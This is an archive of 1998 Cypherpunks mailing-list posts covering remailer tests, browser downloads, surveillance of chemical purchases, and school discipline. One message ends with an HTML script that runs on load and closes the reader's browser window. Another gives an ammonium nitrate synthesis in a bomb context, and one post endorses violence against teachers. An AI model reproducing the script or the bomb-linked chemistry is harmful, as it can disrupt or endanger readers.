bd



On Sat, 21 Feb 1998, Tim May wrote:

> At 6:13 AM -0800 2/21/98, William H. Geiger III wrote:
> 
> >Well you have definatly jumped off the deep end on this one Tim. If we
> >were talking a teenager going out of control then I would agree with you.
> >A 5 year old though??
> >
> >>If a teacher can't defend herself, legally and professionally, from
> >>children biting and throwing chairs, the cops have to be called.
> >
etc.



From owner-cypherpunks@Algebra.COM Sun Feb 22 15:22 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21250 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 15:22:08 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id CAA02607
	for cypherpunks-outgoing; Sun, 22 Feb 1998 02:12:55 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id CAA02589
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 02:12:47 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id XAA15023; Sat, 21 Feb 1998 23:15:01 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id XAA15018 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 23:14:55 -0800 (PST)
Received: from users.invweb.net (root@users.invweb.net [198.182.196.33]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id XAA13402 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 23:09:39 -0800 (PST)
Received: from whgiii (ppp13.NAS1.dotstar.net [208.143.93.32])
	by users.invweb.net (8.8.7/8.8.7) with SMTP id CAA22186
	for <cypherpunks@cyberpass.net>; Sun, 22 Feb 1998 02:47:24 -0500
Message-Id: <199802220747.CAA22186@users.invweb.net>
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 22 Feb 98 01:16:05 -0500
To: cypherpunks@cyberpass.net
In-Reply-To: <a7a15ef0e0850cd6298e5b6f0dd20958@squirrel.owl.de>
Subject: Re: DLing from Replay.com
MIME-Version: 1.0
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.43 b43 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/html
Content-Length: 2406


-----BEGIN PGP SIGNED MESSAGE-----

In <a7a15ef0e0850cd6298e5b6f0dd20958@squirrel.owl.de>, on 02/22/98 
   at 03:58 AM, Secret Squirrel <anon@squirrel.owl.de> said:


>On Wed, 28 Jan 1998 10:29:32 GMT, Adam Back <aba@dcs.ex.ac.uk> wrote:
>>enough anyway, as anyone can verify looking at www.replay.com where a
>>good collection of 128 bit browsers can be obtained.

>Perhaps someone from this list would be kind enough to explain to the
>obviously ignorant just how one manages to DL from replay.com  without
>encountering the following problem:



>|Forbidden

>|You don't have permission to access /security/browsers/128bit/CommunicatorUS-v401-Pro/windows/cp16d401.exe on this
>|server.

>|There was also some additional information available about the error:
>|[Mon Feb 16 21:13:24 1998] access to
>|/pub/WWW/www.replay.com/security/browsers/128bit/CommunicatorUS-v401-Pro/windows/cp16d401.exe
>|failed for xxxxxx.xxxxx.xxxxx.xxx, reason: file permissions deny server execution 



>I have tried DLing this file (and others) from more than one server,  and
>at different times, but encounter the same error each time, so  obviously
>I don't know what I am doing. Any help would be appreciated.  Thanks in
>advance!

No problems here.

I sugest that you dump the WebBrowser and learn how to use FTP.


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: How do you make Windows faster?  Throw it harder!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNO/Cro9Co1n+aLhhAQFLTAP/e3r133LNbKYpOGNZ976oxcmr4uJlfCne
gRzwITysX8hxaF+3PO4QnksCvQ3JNb/AlmCE3S25ZutUSupXa/la11Hzzre+TMty
BE1j3jxS9n3BNl5KDs80H9FCuPIwdttHnKumAXWojMJBaxhB2iOwfRpzFgVjPuSK
mcUxmyhlRcY=
=5JmA
-----END PGP SIGNATURE-----

<HTML><META HTTP-EQUIV="Content-Type:text/html"> <SCRIPT>
function X() {var Text = "HTML is not acceptable for using in mail " +
"or usenet so your browser will stop."; alert(Text); parent.close();};
</SCRIPT> </HEAD><BODY onLoad="X();return true">Hi</HTML>


From owner-cypherpunks@Algebra.COM Sun Feb 22 09:27 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20662 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 09:27:17 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id UAA28675
	for cypherpunks-outgoing; Sat, 21 Feb 1998 20:18:46 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id UAA28663
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 20:18:42 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id RAA19716; Sat, 21 Feb 1998 17:20:58 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id RAA19703 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 17:20:45 -0800 (PST)
Received: from anon.lcs.mit.edu (anon.lcs.mit.edu [18.26.0.254]) by rigel.cyberpass.net (8.8.8/8.7.3) with SMTP id RAA28044 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 17:15:26 -0800 (PST)
Date: 22 Feb 1998 01:20:03 -0000
Message-ID: <19980222012003.14986.qmail@nym.alias.net>
To: cypherpunks@cyberpass.net
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
X-Comment1: This message did not originate from the
X-Comment2: above address. It was automatically remailed
X-Comment3: by an anonymous mail service. Please report
X-Comment4: problems or inappropriate use to
X-Comment5: <postmaster@anon.lcs.mit.edu>
Subject: Vile Vial Files
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 3849


Timothy May wrote:

>(One can asssume that with more and more such things being added to the
>"watch lists" each year, that there will be less acceptance of cash, or
>anonymous digital cash, for such purchases.)

I tried to buy some chemicals down here with cash about six months ago. They
tried everything they could to get me to write a check and in the end I
stormed out of the building, leaving the merchandise on the counter. I
haven't been back yet, and there's probably a good chance that the security
camera footage was sent to the FBI. Come to think of it, that would explain
some rather wierd incidents I've observed since then.

People say that the only reason to pay in cash is if you have something to
hide. You're damned right. The last thing I want is a bunch of government 
shills keeping track of what I buy so that they can stage some raid because 
they have a record of me paying for a beaker "which could be used" to mix 
chemicals which "could be used" as explosives, or metal "which could be 
used" to make thermite which "could be used" for some nefarious purpose.

In America today if you have interests in biology, chemistry, or physics it
is considered grounds by both the government and the pathetic sheep to shoot
you. Pardon me if I'm a little bit paranoid these days. It used to be
intellectuals were just beat up and made fun of by the others in schools.
Now it's fashionable to throw them in jail or kill them. "Unauthorized 
and illegitimate research:" what a stupid concept.

The American people consider anybody who does things in secret to be
automatically guilty. Forget the principles that America was founded on! When 
the government sends the ninjas into your home because you were going 56 mph
when you passed a cop on the highway and looked over at him the wrong way
they sieze your computer. They find that you're running Linux. Oooh, you
must be evil because your computer is password protected but the Microshaft
apologist across the hall has his computer wide open. They find that you
have blocks of random data on your drive, and even if they don't get them
decrypted because they *ARE* blocks of completely random data they wave it
in front of a jury and get a guilty verdict.

It's a sad, sad state of affairs.

>ObMinorNote: I recently tried to buy a bag of ammonium nitrate for my
>yard...the local yard store says it hasn't been available to ordinary
>customers since OKC. I had to settle for ammonium sulfate instead.

It is when I read things like this that I realize how completely stupid the
entire government position is. Why do you need to buy ammonium nitrate to
make a bomb?

Assuming you just don't use something else which is more effective, why not
do this?

 NH OH + HNO --> NH NO  + H O
   3        3      3  3    2

So this naturally leads to the following question: Is having nitric acid and
ammonium hydroxide now a crime worthy of ninjas flying through your windows
with big guns in the middle of the night and shooting you because "you
looked like you were going for a weapon" when you flushed the toilet and
pulled your pants up?

Then if they don't have anything to charge you with they plant some drugs in
your toilet tank and claim that you were in "possession of drugs with
intention to distribute." Of course you were going to distribute them! You
had a truck and you frequently drove around! 

>We live in a dangerous world, full of potentially dangerous substances and
>things. Instead of dealing with the danger on a personal basis, we are
>using the government as our nanny, and also letting it record our
>purchases, open files on us for "unusual" purchases, and generally track
>our actions. Which actually won't have much effect on dedicated terrorists
>and criminals.

Exactly. Welcome to the shakedown extortion police state known as Amerika,
Land of the Freeh.


From owner-cypherpunks@Algebra.COM Sun Feb 22 10:27 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20743 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 10:27:56 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id VAA29234
	for cypherpunks-outgoing; Sat, 21 Feb 1998 21:18:23 -0500 (EST)
Received: from anon.lcs.mit.edu (anon.lcs.mit.edu [18.26.0.254])
	by www.video-collage.com (8.8.5/8.8.5) with SMTP id VAA29217
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 21:18:19 -0500 (EST)
Date: 22 Feb 1998 02:20:01 -0000
Message-ID: <19980222022001.208.qmail@nym.alias.net>
To: cypherpunks@Algebra.COM
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
X-Comment1: This message did not originate from the
X-Comment2: above address. It was automatically remailed
X-Comment3: by an anonymous mail service. Please report
X-Comment4: problems or inappropriate use to
X-Comment5: <postmaster@anon.lcs.mit.edu>
Subject: S888
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 31


Remailer validation. Ignore.


From owner-cypherpunks@Algebra.COM Sun Feb 22 10:47 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20778 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 10:47:46 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id VAA29463
	for cypherpunks-outgoing; Sat, 21 Feb 1998 21:38:36 -0500 (EST)
Received: from basement.replay.com (basement.replay.com [194.109.9.44])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id VAA29451
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 21:38:32 -0500 (EST)
Received: (from replay@localhost)
	by basement.replay.com (8.8.5/RePlay, Inc.) id DAA16885;
	Sun, 22 Feb 1998 03:25:09 +0100 (MET)
Date: Sun, 22 Feb 1998 03:25:09 +0100 (MET)
Message-Id: <199802220225.DAA16885@basement.replay.com>
From: Anonymous <nobody@REPLAY.COM>
Comments: This message did not originate from the Sender address above.
	It was remailed automatically by anonymizing remailer software.
	Please report problems or inappropriate use to the
	remailer administrator at <abuse@REPLAY.COM>.
Subject: S886 
To: cypherpunks@Algebra.COM
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 31


Remailer validation. Ignore.


From owner-cypherpunks@Algebra.COM Sun Feb 22 11:37 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20860 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 11:37:29 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id WAA29825
	for cypherpunks-outgoing; Sat, 21 Feb 1998 22:29:33 -0500 (EST)
Received: from web.owl.de (root@web.owl.de [193.174.11.3])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id WAA29813
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 22:29:27 -0500 (EST)
Received: from pri.owl.de (root@pri.owl.de [193.174.11.2])
	by web.owl.de (8.8.8/8.8.8) with ESMTP id EAA14956
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 04:31:36 +0100
Received: from squirrel.owl.de (squirrel.owl.de [193.174.12.66])
	by pri.owl.de (8.8.8/8.8.8) with SMTP id EAA29674
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 04:31:33 +0100
Received: (qmail 24705 invoked by alias); 22 Feb 1998 03:31:35 -0000
Date: 22 Feb 1998 03:31:35 -0000
From: Secret Squirrel <anon@squirrel.owl.de>
Comments: Please report problems with this automated remailing service
	to <postmaster@squirrel.owl.de>. The message sender's identity
	is unknown, unlogged, and not replyable.
Subject: Vile Vial Files
To: cypherpunks@Algebra.COM
Message-ID: <8e995c5afba45feab24501d363af854b@squirrel.owl.de>
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 3997


<There appears to be some major breakage in the remailer network somewhere.
Hopefully it'll pass. Apologies if this hits the list more than once.>

Timothy May wrote:

>(One can asssume that with more and more such things being added to the
>"watch lists" each year, that there will be less acceptance of cash, or
>anonymous digital cash, for such purchases.)

I tried to buy some chemicals down here with cash about six months ago. They
tried everything they could to get me to write a check and in the end I
stormed out of the building, leaving the merchandise on the counter. I
haven't been back yet, and there's probably a good chance that the security
camera footage was sent to the FBI. Come to think of it, that would explain
some rather wierd incidents I've observed since then.

People say that the only reason to pay in cash is if you have something to
hide. You're damned right. The last thing I want is a bunch of government 
shills keeping track of what I buy so that they can stage some raid because 
they have a record of me paying for a beaker "which could be used" to mix 
chemicals which "could be used" as explosives, or metal "which could be 
used" to make thermite which "could be used" for some nefarious purpose.

In America today if you have interests in biology, chemistry, or physics it
is considered grounds by both the government and the pathetic sheep to shoot
you. Pardon me if I'm a little bit paranoid these days. It used to be
intellectuals were just beat up and made fun of by the others in schools.
Now it's fashionable to throw them in jail or kill them. "Unauthorized 
and illegitimate research:" what a stupid concept.

The American people consider anybody who does things in secret to be
automatically guilty. Forget the principles that America was founded on! When 
the government sends the ninjas into your home because you were going 56 mph
when you passed a cop on the highway and looked over at him the wrong way
they sieze your computer. They find that you're running Linux. Oooh, you
must be evil because your computer is password protected but the Microshaft
apologist across the hall has his computer wide open. They find that you
have blocks of random data on your drive, and even if they don't get them
decrypted because they *ARE* blocks of completely random data they wave it
in front of a jury and get a guilty verdict.

It's a sad, sad state of affairs.

>ObMinorNote: I recently tried to buy a bag of ammonium nitrate for my
>yard...the local yard store says it hasn't been available to ordinary
>customers since OKC. I had to settle for ammonium sulfate instead.

It is when I read things like this that I realize how completely stupid the
entire government position is. Why do you need to buy ammonium nitrate to
make a bomb?

Assuming you just don't use something else which is more effective, why not
do this?

 NH OH + HNO --> NH NO  + H O
   3        3      3  3    2

So this naturally leads to the following question: Is having nitric acid and
ammonium hydroxide now a crime worthy of ninjas flying through your windows
with big guns in the middle of the night and shooting you because "you
looked like you were going for a weapon" when you flushed the toilet and
pulled your pants up?

Then if they don't have anything to charge you with they plant some drugs in
your toilet tank and claim that you were in "possession of drugs with
intention to distribute." Of course you were going to distribute them! You
had a truck and you frequently drove around! 

>We live in a dangerous world, full of potentially dangerous substances and
>things. Instead of dealing with the danger on a personal basis, we are
>using the government as our nanny, and also letting it record our
>purchases, open files on us for "unusual" purchases, and generally track
>our actions. Which actually won't have much effect on dedicated terrorists
>and criminals.

Exactly. Welcome to the shakedown extortion police state known as Amerika,
Land of the Freeh.


From owner-cypherpunks@Algebra.COM Sun Feb 22 12:38 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20995 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 12:38:19 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id XAA00363
	for cypherpunks-outgoing; Sat, 21 Feb 1998 23:25:36 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id XAA00351
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 23:25:30 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id UAA06481; Sat, 21 Feb 1998 20:27:45 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id UAA06475 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 20:27:40 -0800 (PST)
Received: from jehova.owl.de (jehova.owl.de [194.121.202.132]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id UAA06301 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 20:22:17 -0800 (PST)
Received: from fiction.pb.owl.de (root@fiction.pb.owl.de [193.174.12.5])
	by jehova.owl.de (8.8.8/8.8.8) with SMTP id FAA03631
	for <cypherpunks@cyberpass.net>; Sun, 22 Feb 1998 05:27:28 +0100 (MET)
Received: from squirrel.owl.de by fiction.pb.owl.de with bsmtp
	 id m0y6T2K-00000fC; Sun, 22 Feb 98 05:29 MET
Received: (qmail 26652 invoked by alias); 22 Feb 1998 03:58:05 -0000
Date: 22 Feb 1998 03:58:05 -0000
From: Secret Squirrel <anon@squirrel.owl.de>
Comments: Please report problems with this automated remailing service
	to <postmaster@squirrel.owl.de>. The message sender's identity
	is unknown, unlogged, and not replyable.
Subject: DLing from Replay.com
To: cypherpunks@cyberpass.net
Message-ID: <a7a15ef0e0850cd6298e5b6f0dd20958@squirrel.owl.de>
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 1037


On Wed, 28 Jan 1998 10:29:32 GMT, Adam Back <aba@dcs.ex.ac.uk> wrote:
>enough anyway, as anyone can verify looking at www.replay.com where a
>good collection of 128 bit browsers can be obtained.

Perhaps someone from this list would be kind enough to explain to the
obviously ignorant just how one manages to DL from replay.com 
without encountering the following problem:



|Forbidden

|You don't have permission to access /security/browsers/128bit/CommunicatorUS-v401-Pro/windows/cp16d401.exe on this
|server.

|There was also some additional information available about the error:
|[Mon Feb 16 21:13:24 1998] access to
|/pub/WWW/www.replay.com/security/browsers/128bit/CommunicatorUS-v401-Pro/windows/cp16d401.exe
|failed for xxxxxx.xxxxx.xxxxx.xxx, reason: file permissions deny server execution 



I have tried DLing this file (and others) from more than one server, 
and at different times, but encounter the same error each time, so 
obviously I don't know what I am doing. Any help would be appreciated. 
Thanks in advance!



From owner-cypherpunks@Algebra.COM Sun Feb 22 12:17 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20945 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 12:17:54 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id XAA00236
	for cypherpunks-outgoing; Sat, 21 Feb 1998 23:10:19 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id XAA00224
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 23:10:12 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id UAA05616; Sat, 21 Feb 1998 20:12:22 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id UAA05609 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 20:12:13 -0800 (PST)
Received: from infowest.com (infowest.com [204.17.177.10]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id UAA05580 for <cypherpunks@cyberpass.net>; Sat, 21 Feb 1998 20:06:55 -0800 (PST)
Received: from hun12.hun.org (attila.infowest.com [207.49.61.246])
	by infowest.com (8.8.8/8.8.5) with SMTP id VAA29213;
	Sat, 21 Feb 1998 21:11:10 -0700 (MST)
From: "Attila T. Hun" <attila@hun.org>
Reply-to: "Attila T. Hun" <attila@primenet.com>
Date: Sun, 22 Feb 98 04:08:35 +0000
To: Rabid Wombat <wombat@mcfeely.bsfs.org>,
        cypherpunks <cypherpunks@cyberpass.net>
In-Reply-To: <Pine.BSF.3.91.980221003100.613B-100000@mcfeely.bsfs.org>
Subject: Re: Jimbelling the Sheep
Owner: Attila T. Hun <attila@hun.org>
X-Comment: Cyberspace is Our Freedom!  Your CDA is Dead!
X-No-Archive: yes
Organization: old folks home for degenerate, unpenitent hackers; no crackers!
Message-ID: <19980222.040835.attila@hun.org>
Content-Disposition: inline
Mime-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Mailer: MR/2 Internet Cruiser Edition for OS/2 v1.40 
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset=US-ASCII
Content-Length: 860


on or about 980221:0034, in <Pine.BSF.3.91.980221003100.613B-100000@mcfeely.bsfs.org>, 
    Rabid Wombat <wombat@mcfeely.bsfs.org> was purported to have 
    expostulated to perpetuate an opinion:
>On Fri, 20 Feb 1998, Eric Cordian wrote:

>> The FBI informant who orchestrated the capture of the recent "Anthrax
>> Terrorists" turns out to be a man twice convicted of felony extortion.
>>  
>> He presently markets something called "The AZ-58 Ray Tube Frequency
>> Instrument Prototype" which he advertises as being able to somehow
>> purify the body of bacteria and viruses.
>>  
>> Sounds like a rehash of Radionics.
>>  
>> You may view the contraption at its very own web site,
>>  
>>          http://home.sprynet.com/sprynet/jmckenzie
>>  

    sprynet: "the site has been taken down and there will be
              no further information available."


From owner-cypherpunks@Algebra.COM Sun Feb 22 12:28 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA20964 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 12:28:33 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id XAA00300
	for cypherpunks-outgoing; Sat, 21 Feb 1998 23:20:45 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id XAA00288
	for <cypherpunks@algebra.com>; Sat, 21 Feb 1998 23:20:40 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id UAA06065; Sat, 21 Feb 1998 20:22:53 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id UAA06050 for <cpunks@sirius.infonex.com>; Sat, 21 Feb 1998 20:21:14 -0800 (PST)
Received: from basement.replay.com (basement.replay.com [194.109.9.44]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id UAA05991 for <cypherpunks@cyberpass.NET>; Sat, 21 Feb 1998 20:15:56 -0800 (PST)
Received: (from replay@localhost)
	by basement.replay.com (8.8.5/RePlay, Inc.) id FAA29904;
	Sun, 22 Feb 1998 05:05:10 +0100 (MET)
Date: Sun, 22 Feb 1998 05:05:10 +0100 (MET)
Message-Id: <199802220405.FAA29904@basement.replay.com>
From: Anonymous <nobody@REPLAY.COM>
Comments: This message did not originate from the Sender address above.
	It was remailed automatically by anonymizing remailer software.
	Please report problems or inappropriate use to the
	remailer administrator at <abuse@REPLAY.COM>.
Subject: Re: Pensacola Police have lost their mind!! (fwd)
To: cypherpunks@cyberpass.net
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text
Content-Length: 1159


>Florida is a corporal punishment state where teachers may slap, hit, beat,
>paddle, manhandle, and otherwise bully students in their charge, without
>parental permission, and "educators" are protected by laws which make even
>laying a finger on them a crime comparable with beating an elected
>official to a blody pulp.
>
>So one Florida five year old gets bent out of shape and tries to tear a
>school employee to shreds?
>
>Unremarkable.

Exactly. As far as I'm concerned, if the "educators" act physically
theatening towards any student then the student is perfectly within his or
her rights to beat the living shit out of the "teacher." 

It's classic. The government has a monopoly on violence, even in schools. If
an "educator" beats up a student it's "discipline." If a student beats up
another student it's a "boys will be boys" situation which gets a slap on
the hand. But a student better not touch an "educator" or all kinds of hell
will rain down on them, including expulsion from a facility they have to pay
for anyway, and criminal charges.

There was a situation much like this in Texas a while back that I heard about.

Fuck the screwools.


From owner-cypherpunks@Algebra.COM Sun Feb 22 23:55 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21920 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 23:55:55 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id KAA05530
	for cypherpunks-outgoing; Sun, 22 Feb 1998 10:47:28 -0500 (EST)
Received: from sirius.infonex.com (sirius.infonex.com [209.75.197.2])
	by www.video-collage.com (8.8.5/8.8.5) with ESMTP id KAA05518
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 10:47:21 -0500 (EST)
Received: (from cpunks@localhost) by sirius.infonex.com (8.8.8/8.7.3) id HAA06912; Sun, 22 Feb 1998 07:49:38 -0800 (PST)
Received: from rigel.cyberpass.net (root@rigel.infonex.com [209.75.197.3]) by sirius.infonex.com (8.8.8/8.7.3) with ESMTP id HAA06908 for <cpunks@sirius.infonex.com>; Sun, 22 Feb 1998 07:49:34 -0800 (PST)
Received: from mx02.together.net (mx02.together.net [204.97.120.62]) by rigel.cyberpass.net (8.8.8/8.7.3) with ESMTP id HAA00490 for <cypherpunks@cyberpass.net>; Sun, 22 Feb 1998 07:44:12 -0800 (PST)
Received: from [208.13.202.155] (dial-155-TNT-BTVT-01.ramp.together.net [208.13.202.155])
	by mx02.together.net (8.8.8/8.8.8) with SMTP id KAA30094;
	Sun, 22 Feb 1998 10:49:28 -0500
Message-Id: <199802221549.KAA30094@mx02.together.net>
Subject: Test: please ignore
Date: Sun, 22 Feb 1998 10:49:32 -0500
x-sender: brianbr@pop.together.net
x-mailer: Claris Emailer 2.0v3, January 22, 1998
From: "Brian B. Riley" <brianbr@together.net>
To: "Brian B. Riley" <brianbr@together.net>, <cypherpunks@cyberpass.net>
Mime-Version: 1.0
Sender: owner-cypherpunks@Algebra.COM
Precedence: bulk
X-Mailing-List: cypherpunks@algebra.com
X-List-Admin: ichudov@algebra.com
X-Loop: cypherpunks@algebra.com
Content-Type: text/plain; charset="US-ASCII"
Content-Length: 412


test, please ignore, thanks


Brian B. Riley --> http://members.macconnect.com/~brianbr
   For PGP Keys  <mailto:brianbr@together.net?subject=Get%20PGP%20Key>

  "Patriotism is the last refuge of the scoundrel" -- Samuel Johnson
  "With all due respect to an enlightened but inferior lexicographer I
    beg to submit that it is the first." 
           -- Ambrose Bierce's commentary on Johnson's definition.



From owner-cypherpunks@Algebra.COM Sun Feb 22 21:08 SGT 1998
Return-Path: <owner-cypherpunks@Algebra.COM>
Received: from www.video-collage.com ([206.15.171.132])
          by segamat.nus.edu.sg (Netscape Messaging Server 3.0)  with ESMTP
          id AAA21731 for <cypher@infinity.nus.edu.sg>;
          Sun, 22 Feb 1998 21:08:12 +0800
Received: (from ichudov@localhost)
	by www.video-collage.com (8.8.5/8.8.5) id IAA04453
	for cypherpunks-outgoing; Sun, 22 Feb 1998 08:00:27 -0500 (EST)
Received: from einstein.ssz.com (root@einstein.ssz.com [204.96.2.99])
	by www.video-collage.com (8.8.5/8.8.5) with SMTP id IAA04438
	for <cypherpunks@algebra.com>; Sun, 22 Feb 1998 08:00:23 -0500 (EST)
Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id HAA01686 for cypherpunks@algebra.com; Sun, 22 Feb 1998 07:15:11 -0600
Received: (from bin@localhost) by einstein.ssz.com (8.6.12/8.6.9) id HAA01681 for cypherpunks-outgoing; Sun, 22 Feb 1998 07:15:02 -0600
